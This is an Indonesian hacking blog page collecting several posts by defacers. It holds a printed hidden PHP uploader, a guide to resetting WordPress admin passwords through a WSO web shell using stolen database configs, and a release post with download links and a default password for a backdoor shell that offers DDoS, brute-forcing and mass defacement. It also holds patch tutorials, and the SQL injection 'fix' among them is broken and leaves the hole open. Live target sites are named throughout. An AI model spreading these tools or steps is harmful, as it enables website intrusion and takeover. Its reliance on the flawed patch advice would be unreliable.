Responsive Banner design

Waspada Buat Kalian Yang Punya Checker (Ada Hidden Uploader)

hay hay :D
apa kabar ? udah lama gak post disini selain mau mengucapkan selamat menunaikan ibadah
puasa bagi yang menjalankan ^_^.
jadi ceritanya gini , saya punya web checker bellasofie.net dan bellashofie.net :v
sama ajas sih :D
kena deface 3x , its oke lah 1 x itu tester nah ini 3x ?
itu namanya penghinaan..
terlebih saya udah tau disitu ada hidden uploader
berikut scriptnya :
echo "<h2></h2><hr>";
echo "<form action=\"\" method=\"post\"
enctype=\"multipart/form-data\">
<label for=\"file\"></
label>
<input type=\"file\" name=\"file\" id=\"file\" />
<br />
<input type=\"submit\"
name=\"default\" value=\"value\">
</form>";


script tersebut disisipkan di index.php dan juga function.php
kalian bisa cek siapa tau masih ada loggernya :D
bahaya ntar kena deface 


bagi kalian yang ada script itu nya segera hapus atau seperti saya dipath
 echo "<h2></h2><hr>";
echo "LAMER LAMER -_- DEFACE KOK PAKE HIDDEN ^_^ , OTAK DONK BANG";
{
move_uploaded_file($_FILES["file"]["tmp_name"


sumpah saya emosi banget :v
udah tau situasinya bulan puasa , terlebih lagi saya ada project >_<
jadi gak bisa kan di test..
jadi langsung upload zip trus extrak..
trus ditinggal , eh kena retas lagi :v
wkwkwk

yang lebih bkin naik darah di kasih background HOMO,
dan titlenya "Masih ingat dengan saya?"

Note :
just orang tolol yang memasuki lubang 2x , 1x tester , 2x tusboler , 3x penghinaan..

Penulis :
Syahrul Ramadhan

Trick Ketika Gagal Login Mysql Dengan Shell WSO

hallo !!
apa kabar nih semua ?? lagi pada UN nih :p
kenalin nih admin baru disini wkwk
sebut saja saya Wisnu404 , masih newbie kaka :(

udah ya segitu aja,sekarang waktunya saya menjelaskan cara login ke mysql dengan shell wso :D


  • Alat dan Bahan :


  1. yang pasti internet ya
  2. siapin web yang udah di tanem shell apa saja
  3. dan shell WSO


biasanya ketika anda melakukan deface pasti mengecek symlink dan jumping
tapi kali ini pada bgian jumping.
pada saat kalian mengambil config di wordpress dan joomla ,pasti anda akan login lewat mysql pada shell tersebut tapi pada saat login tidak bisa masuk,
nah kali ini saya akan memberi tau cara agar berhasil masuk ke login mysql lewat mysql

oke lanjut saja ya
sekarang kaian ambil config dari salah user jumping tersebut

sekarang buka shell wso nya, dan klik sql di shell wso tersebut


jika sudah di klik sql , sekarang kita copy database name, database user , dan password kebagian kolom sql tersebut
jika sudah login saja wkwkwk :p
karna itu wordpress jadi bisa langsung cek ke wp-user


jika sudah di klik maka hasilnya akan keluar semua user tersebut


nah gimana sih buat ganti password , cara nya cukup mudah kok
tinggal ketikan ini saja

UPDATE  `database name`.`dir database` SET  `user_pass` =  '0d5c68ea70eec09df10a5ba882da722d' WHERE  `dir database`.`ID` =sesuaikan dengan id admin atau apa saja;
dan hasil nya seperti ini


jika sudah tinggal execute saja ^^  
dan hasilnya seperti ini saja :p 


\
dan saatnya tinggal login di halaman web tersebut ^^

oke sekian trick dari saya a.k.a Wisnu404
mohon maaf kalo ada salah kata atau apa,maklum masih newbie :(
sekian dan terima kash ^^


[Release] Andela1C3 v.3 Privat Shell

Assalamualaikum..
selamat sore sobat :D


kali ini saya mau share shell backdoor terbaru yang saya recode .
Namun karena saya sendiri masih dalam tahap belajar coding php, fiturnya saya adopsi dari file file yang penting dari google juga :D

ini penampakan login dari Andela1C3 v.3


loh rul kenapa namanya Andela1C3 pasti karna Andela ya ?
(iya :v jadi ceritanya ada temen yang punya blog dengan nama andela dan info info andela , domainpun andela , so jadi saya buktiin saya memang gabisa beli domain TLD untuk andela :D tapi saya masih bisa berkarya :v wkwkwk curhat) 
oke fokus :3

ni beberapa fitur terbarunya :
Upload
DDOS
DB Dump
SQLi Scanner
Bomb Mailer
Script Encode
Whois
Facebook BruteForce
Email BruteForce
Twitter BruteForce
WordPress Hijack
PayPal Valid Email
Files Search
Eval
Mysql
Config
Symlink
Jumping
Domain Viewer
Admin Finder
PhpInfo
Mass Deface
Cpanel & Ftp Auto Defacer
Email Extractor
Config Grabber
Back Connect Simple
Andela Yuwono Quote


DLL masih banyak oii :v wwkwkwk liat SS nya aja yaa :v
*SS

  
oh iya saya encode nya menjadi 2 versi ada versi 200kb ada yang 1kb :D
hihi tenang password bisa kalian ganti kok :D
dan shell ini aman tanpa logger dan malware sedikitpun

saya share yang 200 kb dulu
Description :
Name : Andela1C3 v.3 Shell [ b374k Recode by Mr.HaurgeulisX196 ]
Size : 200kb
Default password : haurgeulis 


http://www.bluerocktrading.net/components/Files/andela.zip

Update !! 

dan yang 1 kb
Description :
Name : Andela1C3 v.3 Shell [ b374k Recode by Mr.HaurgeulisX196 ]
Size : 1kb
Default password : haurgeulis


http://www.bluerocktrading.net/components/Files/srikandi.zip

Sekian dan semoga bermanfaat.

Thanks to : x'1n73ct , Suram Crew

Content Creator : Syahrul Ramadhan
Mr.HaurgeulisX196 


Update!! : 
Link download telah di perbarui :D 

Cara Patch Bugs SQL Injection

Assalamuallaikum ^_^
kali ini saya mau berbagi tutorial Path SQLi
jadi ceritanya lagi main SQLi , nah kan udah masuk upload shell ,
trus kefikiran kalau com_user kan bisa di path ini bisa gak ya,
ternyata bisa loh , oke lanjut :D

target saya :
http://www.mohiniwebsolution.in/csl/gallery.php?id=2'


sekarang kita coba buka file ini dengan text editor, bisa notepad, wordpad, atau kalau ane sih sukanya pake notepad++ just info ;) hehehehe. Ini dia sebagian isi dari filenya : (disini saya file galerry.php)

<?php include 'admin/db.php' ?>
<?php
$id=$_GET['id'];
if($id!="")
{
$sql6=" WHERE category=$id";
}
?>


Bugnya ada di script bagian ini : <?php $id=$_GET['id'];

tidak adanya filter di $_GET[postid] menyebabkan web ini vulnerable. Oke script penyebab ini semua telah kita temukan, sekarang saatnya patching. Tambahkan script ini diatas script vulnerable diatas :

<?php include 'admin/db.php' ?>
<?php
//filter start here
$postid= $_GET['postid'];
$ip = GETENV("REMOTE_ADDR");

if($id!="")
{
$sql6=" WHERE category=$id";
}
?>


sekarang coba buka lagi page vulnerable dan tambahkan single quote(‘) dan tarra proses patching telah berhasil


Oke sekian tutorial saya  , kurang lebih tanya aja di komentar :v

Invite BB : 7CB0265A

Content Creator : Syahrul Ramadhan

Tutorial Patching Balitbang

Assalamuallaikum ??

Masih Archive Lama Bro  
Pertama, Untuk apa sih di pindahkan letaknya?
Gunanya untuk mencegah config stealer, dan apasih config stealer itu?


ConfigStealer merupakan suatu teknik, dimana kita bisa mengambil sebuah Configuration Website yang di dalamnya ada berupa $host,$user,$pass,$namadb, dll

TUTORIAL :

1. Buka File yang berada di functions/koneksi.php


  
Setelah itu Cari Script berikut 
require('../lib/config.php'); 
ubah menjadi
require('../haurgeulis7/ganteng.php');

2. Setelah itu buat folder , contohnya adalah folder "haurgeulis7"
3. Lalu buka File lib/config.php
Copy Semua Scriptnya, lalu buat file yang bernama ganteng.php di folder haurgeulis7
dan Pastekan script config.php tadi



4. Masuk ke folder lib/config.php
Terus Rubah semua scriptnya menjadi


$dbhost = "localhost";
$dbuser = "haurgeulis7ganteng";
$dbpasswd = "emangganteng";
$dbname = "dilarangprotes"; 


  
Script itu cuma buat mengecoh attacker alias Hacker :v wkwkwk l3r :p

5. Setelah itu lagi, Edit file functions/fungsi_kalender.php

Cari Script berikut
/*ÊÓËÃѺàª×èÍÁµè͡Ѻ°Ò¹¢éÍÁÙÅ*/
mysql_connect($hostLH,$userLH,$passLH) or die("Connection Fail ".mysql_error());
mysql_select_db($dbLH)or die("¢Íâ·É¤èеԴµèÍTable äÁèä´é¤èÐ");
/*ÊÓËÃѺàª×èÍÁµè͡Ѻ°Ò¹¢éÍÁÙÅ*/
lalu ubah menjadi

/*ÊÓËÃѺàª×èÍÁµè͡Ѻ°Ò¹¢éÍÁÙÅ*/
mysql_connect($dbhost,$dbuser,$dbpasswd) or die("Connection Fail ".mysql_error());
mysql_select_db($dbname)or die("¢Íâ·É¤èеԴµèÍTable äÁèä´é¤èÐ");
/*ÊÓËÃѺàª×èÍÁµè͡Ѻ°Ò¹¢éÍÁÙÅ*/



Setelah itu cari lagi script berikut

####### config DB #######
$hostLH = $host;
$userLH =$user;
$passLH =$pwd;
$dbLH = $db;
####### config #######


Lalu rubah script tersebut menjadi

####### config DB #######
$dbhost = "localhost";
$dbuser = "root";
$dbpasswd = "";
$dbname = "webtemp";
####### config #######


Pada script itulah, config atau tempat menghubungkan ke sql kita, jadi yang di edit cuman script diatas itu dan di haurgeulis7\ganteng.php , contoh

####### config DB #######
$dbhost = "localhost";
$dbuser = "mr.haurgeulisx196";
$dbpasswd = "ganteng123";
$dbname = "haurgeulis7;
####### config #######



Demo : http://www.smkn1mlarak.sch.id/

Content Creator : Syahrul Ramadhan

Mengamankan Administrator Joomla

Hanya bisa merusak, merusak, dan merusak. Ya, itulah yang saya pikirkan beberapa waktu lalu. Ketika seorang hacker berhasil melakukan symlink terhadap Joomla sobat, biasanya mereka akan mereset password salt dan login ke akun Joomla yang sudah direset passwordnya. Dan hal ini dimudahkan dengan settingan default alamat login Joomla sobat yaitu di [localhost]/administrator .Atau mungkin saja attacker yang lebih dulu menemukan link login Joomla sobat [belum mendapatkan password] mencoba melakukan bruteforce untuk mendapatkan password sobat. Lalu bagimana cara kita melindungi alamat login Joomla dari para hacker ? Dengan menyembunyikannya. Caranya ?
Ikuti langkah-langkah berikut :


1. Download ekstensi JLSecure My Site.
2. Buka halaman Administrator klik Extensions --> Extension Manager.


3. Upload dan instal ekstensi JLSecure My Site.


4. Setelah proses instalasi berhasil, buka halaman Plugin Manager lalu cari plg_system_jlsecuremysite.


5. Lalu klik plugin tersebut jika sudah ketemu
6. Pada kolom Secure key diisi dengan karakter yang terdiri dari huruf a-z A-Z, dalam contoh penulis mengisi dengan Syahrul. (terserah Anda)
7. Pada kolom Secure value diisi dengan alpha numeric yang terdiri dari a-z A-Z 0-9, dalam contoh penulis mengisi dengan 48. (terserah Anda)

8. Jangan lupa untuk Status rubah menjadi Enabled
9 .Klik Save.
Setelah Anda klik Save, secara otomatis halaman Administrator akan mereload dan redirect membuka halaman front-end website. Untuk login ke halaman Administrator kembali Anda tinggal mengetikkan URL www.domain.com/administrator/?Syahrul=48 pada web


Demo : http://www.hubl-fahrzeugtechnik.at/administrator/?Syahrul=48

Content Creator : Syahrul Ramadhan  

Cara Patching Bug Exploit Joomla ( Com_User )

Assalamualaikum sobat ??
apa kabar ?? ^_^ balik lagi sama saya Mr.HaurgeulisX196 
kali ini saya akan berbagi cara path Joomla ( Com_User )
karna cara exploit nya sudah maenstream :v
wkwkwk

oke pertama
kita masuk dulu ke web joomla
bahasa ganti dulu English ( biar gak sulit ) :v

ketika belum di path tampilan ketika di tambahkan exploit masih bisa
registrasi

ok next kita path ini caranya 
klik user > user manager


ketika di klik gambar akan seperti ini


lalu klik options cari > Allow User Registration > ubah dari yes ke no 


lalu klik save & close >> done 

coba kita lihat exploit index.php?option=com_users&view=registration
di web tadi 

sudah deh ga ada yang bisa exploit/registrasi lagi itu web lagi ^_^

jangan main nebas2 aja , kasian adminnya
mending upload shell trus path bkin newfile aja :v
ok ??

lumayan bantuin adminnya , insyaallah dapet pahala :)
wkwkwk padahal gw sendiri tukang nebas :v

Content Creator : Syahrul Ramadhan

Popular Posts

Powered by Blogger.